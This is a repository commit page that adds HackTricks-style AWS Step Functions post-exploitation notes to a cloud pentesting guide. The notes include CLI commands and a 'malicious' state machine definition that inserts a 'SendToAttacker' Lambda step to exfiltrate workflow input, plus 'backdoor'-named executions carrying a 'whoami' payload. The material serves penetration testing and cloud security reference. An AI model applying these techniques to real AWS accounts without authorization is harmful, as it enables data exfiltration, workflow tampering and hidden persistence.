gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2025-12-31 07:00:38 -08:00
Code Issues Packages Projects Releases Wiki Activity

Update more post exploitation for step function

Browse Source
This commit is contained in:
kluo84
2025-03-24 20:29:40 -05:00
parent 413635f6ed
commit 49023a7e71
1 changed files with 63 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

63
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md
View File

@@ -71,6 +71,69 @@ aws stepfunctions untag-resource --resource-arn <value> --tag-keys <key>
**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.
### `states:UpdateStateMachine`
This permission allows an attacker to **modify the logic of an existing state machine**. By injecting malicious logic into the state definition, the attacker could:
- Add a **new state** that exfiltrates input/output to an external system (via Lambda or SNS).
- **Bypass security checks**, skip validation steps, or disable error handling.
- **Insert a logic bomb** that triggers under specific input conditions to disrupt execution.
This attack can be subtle, blending into large state definitions, and may go unnoticed without strict ASL version control.
```bash
aws stepfunctions update-state-machine \
--state-machine-arn <value> \
--definition file://malicious_state_definition.json \
--role-arn arn:aws:iam::<account-id>:role/<execution-role>
```
`malicious_state_definition.json`
```json
{
"Comment": "Malicious State Machine - Data Exfiltration",
"StartAt": "ExfiltrateSecrets",
"States": {
"ExfiltrateSecrets": {
"Type": "Task",
"Resource": "arn:aws:lambda:us-east-1:123456789012:function:SendToAttacker",
"InputPath": "$",
"ResultPath": "$.exfiltration_result",
"Next": "LegitimateStep"
},
"LegitimateStep": {
"Type": "Task",
"Resource": "arn:aws:lambda:us-east-1:123456789012:function:LegitBusinessLogic",
"End": true
}
}
}
```
- **Potential Impact**: Data exfiltration, disruption of logic flow, persistent access through hidden states.
---
### `states:StartExecution`
With this permission, an attacker can **trigger executions on demand**, passing arbitrary input to state machines. This allows:
- **Triggering sensitive operations** (e.g., Lambda invocations, EC2 actions) if the workflow handles them.
- **Supplying attacker-controlled input** to abuse poorly validated states.
- **Recon of business logic** by probing execution responses or failures.
Used with `states:GetExecutionHistory`, it becomes a powerful tool for **logic discovery**, **abuse**, or **command execution** through embedded Lambdas or activities.
```bash
aws stepfunctions start-execution \
--state-machine-arn <value> \
--name "backdoor-$(date +%s)" \
--input '{"command":"whoami"}'
```
- **Potential Impact**: Unauthorized triggering of sensitive workflows, business logic abuse, stealthy persistence (can be cron-triggered via EventBridge).
{{#include ../../../banners/hacktricks-training.md}}